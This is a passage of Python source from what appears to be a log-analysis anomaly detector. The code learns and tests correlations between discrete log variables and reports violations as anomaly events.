for _ in range(len(self.discrete_indices[event_index]))] # skipcq: PTC-W0060 for i, val in enumerate(self.discrete_indices[event_index]): for j in range(-1, -self.num_init-1, -1): if self.event_type_detector.values[event_index][val][j] not in variable_values[i]: variable_values[i].append(self.event_type_detector.values[event_index][val][j]) variable_distributions[i].append(1) else: variable_distributions[i][variable_values[i].index(self.event_type_detector.values[event_index][ val][j])] += 1 tmp_sum = sum(variable_distributions[i]) variable_distributions[i] = [variable_distributions[i][j]/tmp_sum for j in range( len(variable_distributions[i]))] if meth == 'excludeDueDistr': useable_indices = [] # list of the indices, which are not excluded if self.variable_type_detector is not None: for i, val in enumerate(self.discrete_indices[event_index]): if self.pick_cor_exclude_due_distr(self.variable_type_detector.var_type[event_index][val][2]): # Add the index to the list of useable indices if it is not excluded useable_indices.append(i) else: for i in range(len(self.discrete_indices[event_index])): # skipcq: PTC-W0060 if self.pick_cor_exclude_due_distr(variable_distributions[i]): # Add the index to the list of useable indices if it is not excluded useable_indices.append(i) tmp_pos_var_cor = [[i, j] for i in useable_indices for j in useable_indices if i < j] elif meth == 'matchDiscDistr': if self.variable_type_detector is not None: for i, val in enumerate(self.discrete_indices[event_index]): for j in range(i+1, len(val)): # skipcq: PTC-W0060 if self.pick_cor_match_disc_distr(self.variable_type_detector.var_type[event_index][ val][2], self.variable_type_detector.var_type[event_index][ self.discrete_indices[event_index][j]][2]): # If self.pick_cor_match_disc_distr returned True the indices are being appended tmp_pos_var_cor.append([i, j]) else: for i in range(len(self.discrete_indices[event_index])): # skipcq: PTC-W0060 for j in range(i+1, len(self.discrete_indices[event_index])): # skipcq: PTC-W0060 if self.pick_cor_match_disc_distr(variable_distributions[i], variable_distributions[j]): # If self.pick_cor_match_disc_distr returned True the indices are being appended tmp_pos_var_cor.append([i, j]) elif meth == 'matchDiscVals': if self.variable_type_detector is not None: for i, val in enumerate(self.discrete_indices[event_index]): for j in range(i+1, len(self.discrete_indices[event_index])): # skipcq: PTC-W0060 if self.pick_cor_match_disc_vals(self.variable_type_detector.var_type[event_index][ val][1], self.variable_type_detector.var_type[event_index][ self.discrete_indices[event_index][j]][1]): # If self.pick_cor_match_disc_vals returned True the indices are being appended tmp_pos_var_cor.append([i, j]) else: for i in range(len(self.discrete_indices[event_index])): # skipcq: PTC-W0060 for j in range(i+1, len(self.discrete_indices[event_index])): # skipcq: PTC-W0060 if self.pick_cor_match_disc_vals(variable_values[i], variable_values[j]): # If self.pick_cor_match_disc_vals returned True the indices are being appended tmp_pos_var_cor.append([i, j]) elif meth == 'random': tmp_pos_var_cor = self.pick_cor_random(event_index) # Initialize, append or intercept self.pos_var_cor with tmp_pos_var_cor # Initialize self.pos_var_cor if first_run: first_run = False self.pos_var_cor[event_index] = tmp_pos_var_cor # Intercept self.pos_var_cor elif self.intersect_presel_meth: for i in range(len(self.pos_var_cor[event_index]) - 1, -1, -1): # skipcq: PTC-W0060 if self.pos_var_cor[event_index][i] not in tmp_pos_var_cor: del self.pos_var_cor[event_index][i] # Append self.pos_var_cor else: for cor in tmp_pos_var_cor: if cor not in self.pos_var_cor[event_index]: self.pos_var_cor[event_index].append(cor) # Initialise the correlation methods for meth in self.used_cor_meth: if meth == 'Rel': self.init_cor_rel(event_index) elif meth == 'WRel': self.init_cor_w_rel(event_index) def init_cor_rel(self, event_index): """Initialize supporting lists for the method 'Rel'.""" # Initialise self.rel_list if len(self.rel_list) < event_index+1: for i in range(event_index + 1 - len(self.rel_list)): self.rel_list.append([]) if len(self.rel_list[event_index]) == 0: for i in range(len(self.pos_var_cor[event_index])): # skipcq: PTC-W0060 self.rel_list[event_index].append([{}, {}]) # Only calculate the correlations once, because the used method allows to efficiently calculate both directions in parallel for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): i = pos_var_cor_val[0] # Index of the first variable in discrete_indices j = pos_var_cor_val[1] # Index of the second variable in discrete_indices for k in range(-1, -self.num_init-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # Check if i_val has not appeared previously if i_val not in self.rel_list[event_index][pos_var_cor_index][0]: # Add the relation i=i_val -> j=j_val self.rel_list[event_index][pos_var_cor_index][0][i_val] = {j_val: 1} # If the j_val has already appeared, then the var i had another value than i_val, # therefore the relation j:j_val -> i:i_val is not possible if j_val in self.rel_list[event_index][pos_var_cor_index][1]: del self.rel_list[event_index][pos_var_cor_index][1][j_val] # Else add the relation j=j_val -> i=i_val else: self.rel_list[event_index][pos_var_cor_index][1][j_val] = {i_val: 1} continue # Check if j_val has not appeared previously if j_val not in self.rel_list[event_index][pos_var_cor_index][1]: # Add the relation j=j_val -> i=i_val self.rel_list[event_index][pos_var_cor_index][1][j_val] = {i_val: 1} # i=i_val -> j=j_val is not possible del self.rel_list[event_index][pos_var_cor_index][0][i_val] continue # At least two possible values, therefore delete the relation if self.rel_list[event_index][pos_var_cor_index][0][i_val] != {} and j_val not in self.rel_list[event_index][ pos_var_cor_index][0][i_val]: del self.rel_list[event_index][pos_var_cor_index][0][i_val] # At least two possible values, therefore delete the relation if self.rel_list[event_index][pos_var_cor_index][1][j_val] != {} and i_val not in self.rel_list[event_index][ pos_var_cor_index][1][j_val]: del self.rel_list[event_index][pos_var_cor_index][1][j_val] # Update the appearance of the relation if (i_val in self.rel_list[event_index][pos_var_cor_index][0]) and (j_val in self.rel_list[event_index][ pos_var_cor_index][0][i_val]): self.rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += 1 if (j_val in self.rel_list[event_index][pos_var_cor_index][1]) and (i_val in self.rel_list[event_index][ pos_var_cor_index][1][j_val]): self.rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += 1 def init_cor_w_rel(self, event_index): """Initialize w_rel_list and runs init_single_cor_w_rel for the chosen indices.""" # Append the w_rel_list and w_rel_num_ll_to_vals if necessary if len(self.w_rel_list) < event_index+1: for _ in range(event_index + 1 - len(self.w_rel_list)): self.w_rel_list.append([]) self.w_rel_num_ll_to_vals.append([]) if len(self.w_rel_list[event_index]) == 0: for _ in range(len(self.pos_var_cor[event_index])): # skipcq: PTC-W0060 self.w_rel_list[event_index].append([{}, {}]) self.w_rel_num_ll_to_vals[event_index].append([{}, {}]) # Only initialize the correlations once, because the used method allows to efficiently calculate both directions in parallel for pos_var_cor_index in range(len(self.pos_var_cor[event_index])): # skipcq: PTC-W0060 self.init_single_cor_w_rel(event_index, pos_var_cor_index) def init_single_cor_w_rel(self, event_index, pos_var_cor_index): """Initialize the first entries of w_rel_list.""" i = self.pos_var_cor[event_index][pos_var_cor_index][0] # Index of the first variable in discrete_indices j = self.pos_var_cor[event_index][pos_var_cor_index][1] # Index of the second variable in discrete_indices for k in range(-1, -self.num_init-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # Updating both lists in w_rel_list[event_index][pos_var_cor_index] and w_rel_num_ll_to_vals[event_index][pos_var_cor_index] # Add an entry for i_val if necessary if i_val not in self.w_rel_list[event_index][pos_var_cor_index][0]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] = 1 else: self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] += 1 # Add an entry for j_val if necessary if j_val not in self.w_rel_list[event_index][pos_var_cor_index][1]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] = 1 else: self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] += 1 # Add the entries for j_val if j_val not in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = 1 # Or update the appearance of the relation else: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += 1 # Add the entries for i_val if i_val not in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = 1 # Or update the appearance of the relation else: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += 1 # Removes the entries of w_rel_list[event_index][pos_var_cor_index] which can not be considered possible correlations # Generate the list of entries in i, which should be deleted delete_i_vals = [i_val for i_val in self.w_rel_list[event_index][pos_var_cor_index][0] if not( self.check_cor_w_rel(self.w_rel_list[event_index][pos_var_cor_index][0][i_val].values(), len( self.pos_var_val[event_index][j])))] # Delete entries of i for i_val in delete_i_vals: del self.w_rel_list[event_index][pos_var_cor_index][0][i_val] del self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] # Generate the list of entries in j, which should be deleted delete_j_vals = [j_val for j_val in self.w_rel_list[event_index][pos_var_cor_index][1] if not( self.check_cor_w_rel(self.w_rel_list[event_index][pos_var_cor_index][1][j_val].values(), len( self.pos_var_val[event_index][i])))] # Delete entries of j for j_val in delete_j_vals: del self.w_rel_list[event_index][pos_var_cor_index][1][j_val] del self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] def update_or_test_cor(self, event_index): """Update or test the possible correlations and removes the false ones.""" for meth in self.used_cor_meth: if meth == 'Rel': self.update_or_test_cor_rel(event_index) elif meth == 'WRel': self.update_or_test_cor_w_rel(event_index) def update_or_test_cor_rel(self, event_index): """Update or test the rel_list.""" for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): i = pos_var_cor_val[0] # Index of the first variable in discrete_indices j = pos_var_cor_val[1] # Index of the second variable in discrete_indices if self.update_rules[event_index] and self.learn_mode: # Update both list in rel_list[event_index][pos_var_cor_index] and create new rules if self.generate_rules[event_index] # is True message = f'New values appeared after the {self.event_type_detector.total_records}-th line in correlation(s) of the event' \ f' {self.event_type_detector.get_event_type(event_index)}' confidence = 0 total_correlations = len([None for _ in self.rel_list[event_index][pos_var_cor_index][0]]) + len( [None for _ in self.rel_list[event_index][pos_var_cor_index][1]]) sorted_log_lines = [] event_data = {'EventIndex': event_index} affected_log_atom_paths = [] value_changes = [] if self.generate_rules[event_index]: failed_i_vals = [] failed_j_vals = [] new_i_vals = [] new_j_vals = [] for k in range(-1, -self.num_update-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # Check if i_val has not appeared previously and appends the message to string or save the index in failed_i_vals # if the correlation was violated if i_val not in self.rel_list[event_index][pos_var_cor_index][0] and self.generate_rules[event_index]: # Add the relation i=i_val -> j=j_val self.rel_list[event_index][pos_var_cor_index][0][i_val] = {j_val: 0} new_i_vals.append(i_val) elif i_val in self.rel_list[event_index][pos_var_cor_index][0] and j_val not in self.rel_list[event_index][ pos_var_cor_index][0][i_val]: if not self.generate_rules[event_index] or i_val not in new_i_vals: sorted_log_lines.append( # skipcq: PYL-C0209 'New value occurred in correlation of the paths %s = %s -> %s = old value: %s / New appeared value: %s' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(i_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(list(self.rel_list[event_index][ pos_var_cor_index][0][i_val].keys())[0]), repr(j_val))) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) change = {'OldValue': repr(list(self.rel_list[event_index][pos_var_cor_index][0][i_val].keys())[0]), 'NewValue': repr(j_val)} value_changes.append(change) del self.rel_list[event_index][pos_var_cor_index][0][i_val] confidence += 1 / total_correlations if self.generate_rules[event_index] and i_val not in failed_i_vals: failed_i_vals.append(i_val) # Check if j_val has not appeared previously and appends the message to string or save the index in failed_j_vals if # the correlation was violated if j_val not in self.rel_list[event_index][pos_var_cor_index][1] and self.generate_rules[event_index]: # Add the relation j=j_val -> i=i_val self.rel_list[event_index][pos_var_cor_index][1][j_val] = {i_val: 0} new_j_vals.append(j_val) elif j_val in self.rel_list[event_index][pos_var_cor_index][1] and i_val not in self.rel_list[event_index][ pos_var_cor_index][1][j_val]: if not self.generate_rules[event_index] or j_val not in new_j_vals: sorted_log_lines.append( # skipcq: PYL-C0209 'New value occurred in correlation of the paths %s = %s -> %s = old value: %s / New appeared value: %s' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(j_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(list(self.rel_list[event_index][ pos_var_cor_index][1][j_val].keys())[0]), repr(i_val))) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) change = {'OldValue': repr(list(self.rel_list[event_index][pos_var_cor_index][1][j_val].keys())[0]), 'NewValue': repr(i_val)} value_changes.append(change) del self.rel_list[event_index][pos_var_cor_index][1][j_val] confidence += 1 / total_correlations if self.generate_rules[event_index] and j_val not in failed_j_vals: failed_j_vals.append(j_val) # Update the appearance of the relations if (i_val in self.rel_list[event_index][pos_var_cor_index][0]) and (j_val in self.rel_list[event_index][ pos_var_cor_index][0][i_val]): self.rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += 1 if (j_val in self.rel_list[event_index][pos_var_cor_index][1]) and (i_val in self.rel_list[event_index][ pos_var_cor_index][1][j_val]): self.rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += 1 # Print the message if at least one correlation was violated if len(sorted_log_lines) != 0: event_data['AffectedLogAtomPaths'] = list(set(affected_log_atom_paths)) event_data['ValueChanges'] = value_changes event_data['TypeInfo'] = {'Confidence': confidence} for listener in self.anomaly_event_handlers: sorted_log_lines += ['']*(self.event_type_detector.total_records - len(sorted_log_lines)) listener.receive_event( f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, self.log_atom, self) # Delete the rules which failed during the rule generation phase if self.generate_rules[event_index]: for i_val in failed_i_vals: if i_val in self.rel_list[event_index][pos_var_cor_index][0]: del self.rel_list[event_index][pos_var_cor_index][0][i_val] for j_val in failed_j_vals: if j_val in self.rel_list[event_index][pos_var_cor_index][1]: del self.rel_list[event_index][pos_var_cor_index][1][j_val] if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = self.log_atom.atom_time + self.stop_learning_no_anomaly_time else: # Only update the possible correlations which have been initialized and print warnings reported_values_ij = {} reported_values_ji = {} for k in range(-1, -self.num_update-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # A new value appeared, therefore append the new value to the list reported_values_ij if i_val in self.rel_list[event_index][pos_var_cor_index][0] and self.rel_list[event_index][pos_var_cor_index][0][ i_val] != {} and j_val not in self.rel_list[event_index][pos_var_cor_index][0][i_val]: if i_val not in reported_values_ij: reported_values_ij[i_val] = {j_val: 1} elif j_val in reported_values_ij[i_val]: reported_values_ij[i_val][j_val] += 1 else: reported_values_ij[i_val][j_val] = 1 # A new value appeared, therefore append the new value to the list reported_values_ji if j_val in self.rel_list[event_index][pos_var_cor_index][1] and self.rel_list[event_index][pos_var_cor_index][1][ j_val] != {} and i_val not in self.rel_list[event_index][pos_var_cor_index][1][j_val]: if j_val not in reported_values_ji: reported_values_ji[j_val] = {i_val: 1} elif i_val in reported_values_ji[j_val]: reported_values_ji[j_val][i_val] += 1 else: reported_values_ji[j_val][i_val] = 1 # Print the message of the reported values for i_val in reported_values_ij: # skipcq: PYL-C0209 message = 'Correlation of the paths %s = %s -> %s = %s would be rejected after the %s-th line' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(i_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][pos_var_cor_val[ 1]]], list(self.rel_list[event_index][pos_var_cor_index][0][i_val].keys())[ 0], self.event_type_detector.total_records) confidence = (sum(reported_values_ij[i_val][j_val] for j_val in reported_values_ij[i_val]) / ( sum(reported_values_ij[i_val][j_val] for j_val in reported_values_ij[i_val]) + 1)) * ( len(reported_values_ij[i_val]) / (len(reported_values_ij[i_val]) + 1)) sorted_log_lines = [] event_data = {'EventIndex': event_index} affected_log_atom_paths = [] affected_values = [] affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) affected_values.append(repr(i_val)) affected_values.append(list(self.rel_list[event_index][pos_var_cor_index][0][i_val].keys())[0]) event_data['AffectedLogAtomPaths'] = list(set(affected_log_atom_paths)) event_data['AffectedValues'] = affected_values event_data['TypeInfo'] = {'Confidence': confidence} sorted_log_lines += [''] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, self.log_atom, self) # Print the message of the reported values for j_val in reported_values_ji: # skipcq: PYL-C0209 message = 'Correlation of the paths %s = %s -> %s = %s would be rejected after the %s-th line' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(j_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][self.pos_var_cor[ event_index][pos_var_cor_index][0]]], list(self.rel_list[event_index][pos_var_cor_index][1][ j_val].keys())[0], self.event_type_detector.total_records) confidence = (sum(reported_values_ji[j_val][i_val] for i_val in reported_values_ji[j_val]) / ( sum(reported_values_ji[j_val][i_val] for i_val in reported_values_ji[j_val]) + 1)) * ( len(reported_values_ji[j_val]) / (len(reported_values_ji[j_val]) + 1)) sorted_log_lines = [] event_data = {'EventIndex': event_index} affected_log_atom_paths = [] affected_values = [] affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) affected_values.append(repr(j_val)) affected_values.append(list(self.rel_list[event_index][pos_var_cor_index][1][j_val].keys())[0]) event_data['AffectedLogAtomPaths'] = list(set(affected_log_atom_paths)) event_data['AffectedValues'] = affected_values event_data['TypeInfo'] = {'Confidence': confidence} sorted_log_lines += [''] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, self.log_atom, self) def update_or_test_cor_w_rel(self, event_index): """Update or test the w_rel_list.""" # Initialise the lists for the BT results if necessary if len(self.w_rel_ht_results) < event_index + 1 or self.w_rel_ht_results[event_index] == []: self.w_rel_ht_results += [[] for i in range(event_index + 1 - len(self.w_rel_ht_results))] self.w_rel_ht_results[event_index] = [ [{i_val: [1] * self.num_bt for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]}, { j_val: [1]*self.num_bt for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range( len(self.pos_var_cor[event_index]))] self.w_rel_confidences += [[] for i in range(event_index + 1 - len(self.w_rel_confidences))] self.w_rel_confidences[event_index] = [ [{i_val: [] for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]}, { j_val: [] for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range( len(self.pos_var_cor[event_index]))] # Initialises the appearance list, as a copy of the w_rel_list with 0 instead of the CountIndices current_appearance_list = [ [{i_val: {j_val: 0 for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]} for i_val in self.w_rel_list[ event_index][pos_var_cor_index][0]}, {j_val: {i_val: 0 for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][ j_val]} for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range( len(self.pos_var_cor[event_index]))] # Counting the appearance of the cases in current_appearance_list for k in range(-1, -self.num_update-1, -1): # List of the values of discrete variables, in one log line vals = [self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] for i in range( len(self.discrete_indices[event_index]))] for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): # Count the appearances if the list is not empty or if new rules should be generated if current_appearance_list[pos_var_cor_index] != [{}, {}] or self.generate_rules[event_index]: i = pos_var_cor_val[0] # Index of the first variable in discrete_indices j = pos_var_cor_val[1] # Index of the second variable in discrete_indices # Add the appearance of the line to the appearance list and adds new entries if self.generate_rules[event_index] # is set to True. if vals[i] in current_appearance_list[pos_var_cor_index][0]: if vals[j] in current_appearance_list[pos_var_cor_index][0][vals[i]]: current_appearance_list[pos_var_cor_index][0][vals[i]][vals[j]] += 1 else: current_appearance_list[pos_var_cor_index][0][vals[i]][vals[j]] = 1 elif self.generate_rules[event_index]: current_appearance_list[pos_var_cor_index][0][vals[i]] = {vals[j]: 1} if vals[j] in current_appearance_list[pos_var_cor_index][1]: if vals[i] in current_appearance_list[pos_var_cor_index][1][vals[j]]: current_appearance_list[pos_var_cor_index][1][vals[j]][vals[i]] += 1 else: current_appearance_list[pos_var_cor_index][1][vals[j]][vals[i]] = 1 elif self.generate_rules[event_index]: current_appearance_list[pos_var_cor_index][1][vals[j]] = {vals[i]: 1} if self.generate_rules[event_index]: # generates new rules or appends new values to existing rules for pos_var_cor_index in range(len(self.pos_var_cor[event_index])): # skipcq: PTC-W0060 # Only consider the possible correlations which have been initialized if current_appearance_list[pos_var_cor_index] != [{}, {}]: # Check correlations i=i_val -> j=j_val and decide if the rules should be deleted, extended or updated, # or if new rules should be generated for i_val in current_appearance_list[pos_var_cor_index][0]: if i_val in self.w_rel_list[event_index][pos_var_cor_index][0]: # Check if new values have appeared, append them and reinitialize the lists tmp_bool = False for j_val in current_appearance_list[pos_var_cor_index][0][i_val]: if j_val not in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: tmp_bool = True break # New values have appeared on the right side if tmp_bool: if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][0][i_val].values(), len(self.pos_var_val[ event_index][j])): # Add new rules self.w_rel_list[event_index][pos_var_cor_index][0][i_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] = sum(current_appearance_list[ pos_var_cor_index][0][i_val].values()) # Add the entries for j_val for j_val in current_appearance_list[pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = current_appearance_list[ pos_var_cor_index][0][i_val][j_val] else: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [0] self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val].append( 0.5 + 1 / len(current_appearance_list[pos_var_cor_index][0][i_val])) self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = self.w_rel_confidences[ event_index][pos_var_cor_index][0][i_val][-(self.num_bt-self.min_successes_bt+1):] if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 0, i_val) del self.w_rel_list[event_index][pos_var_cor_index][0][i_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] # No new values have appeared on the right side. Update the appearance of the relation else: # Check correlations i=i_val -> j=j_val # States True after the following steps if all tests were positive, and False if at least one was negative tmp_bool = True if any(current_appearance_list[pos_var_cor_index][0][i_val][j_val] for j_val in current_appearance_list[ pos_var_cor_index][0][i_val]): tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][0][i_val], current_appearance_list[pos_var_cor_index][0][i_val], event_index, pos_var_cor_index, 0, i_val) # Update the bt_results list if tmp_bool: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [1] for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += current_appearance_list[ pos_var_cor_index][0][i_val][j_val] else: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [0] if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 0, i_val) del self.w_rel_list[event_index][pos_var_cor_index][0][i_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] # i_val not in self.w_rel_list[event_index][pos_var_cor_index][0]. Therefore, test if the rule should be used else: if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][0][i_val].values(), len(self.pos_var_val[ event_index][j])): self.w_rel_list[event_index][pos_var_cor_index][0][i_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] = sum(current_appearance_list[ pos_var_cor_index][0][i_val].values()) self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = [1] * self.num_bt self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = [] # Add the entries for j_val for j_val in current_appearance_list[pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = current_appearance_list[ pos_var_cor_index][0][i_val][j_val] # Check correlations j=j_val -> i=i_val and decide if the rules should be deleted, extended or updated, # or if new rules should be generated. for j_val in current_appearance_list[pos_var_cor_index][1]: if j_val in self.w_rel_list[event_index][pos_var_cor_index][1]: # Check if new values have appeared, append them and reinitialize the lists tmp_bool = False for i_val in current_appearance_list[pos_var_cor_index][1][j_val]: if i_val not in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: tmp_bool = True break # New values have appeared on the right side if tmp_bool: if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][1][j_val].values(), len(self.pos_var_val[ event_index][i])): # Add new rules self.w_rel_list[event_index][pos_var_cor_index][1][j_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] = sum(current_appearance_list[ pos_var_cor_index][1][j_val].values()) # Add the entries for i_val for i_val in current_appearance_list[pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = current_appearance_list[ pos_var_cor_index][1][j_val][i_val] else: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [0] self.w_rel_confidences[event_index][pos_var_cor_index][1][j_val].append( 0.5 + 1 / len(current_appearance_list[pos_var_cor_index][1][j_val])) self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = self.w_rel_confidences[ event_index][pos_var_cor_index][0][i_val][-(self.num_bt-self.min_successes_bt+1):] if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 1, j_val) del self.w_rel_list[event_index][pos_var_cor_index][1][j_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] # No new values have appeared on the right side. Update the appearance of the relation else: # Check correlations i=i_val -> j=j_val # States True after the following steps if all tests were positive, and False if at least one was negative tmp_bool = True if any(current_appearance_list[pos_var_cor_index][1][j_val][i_val] for i_val in current_appearance_list[ pos_var_cor_index][1][j_val]): tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][1][j_val], current_appearance_list[pos_var_cor_index][1][j_val], event_index, pos_var_cor_index, 1, j_val) # Update the bt_results list if tmp_bool: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [1] for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += current_appearance_list[ pos_var_cor_index][1][j_val][i_val] else: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [0] if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 1, j_val) del self.w_rel_list[event_index][pos_var_cor_index][1][j_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] # j_val not in self.w_rel_list[event_index][pos_var_cor_index][1]. Therefore, test if the rule should be used else: if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][1][j_val].values(), len(self.pos_var_val[ event_index][i])): self.w_rel_list[event_index][pos_var_cor_index][1][j_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] = sum(current_appearance_list[ pos_var_cor_index][1][j_val].values()) self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = [1] * self.num_bt self.w_rel_confidences[event_index][pos_var_cor_index][1][j_val] = [] # Add the entries for i_val for i_val in current_appearance_list[pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = current_appearance_list[ pos_var_cor_index][1][j_val][i_val] else: # Tests and updates the correlation rules for pos_var_cor_index, pos_var_cor_val in 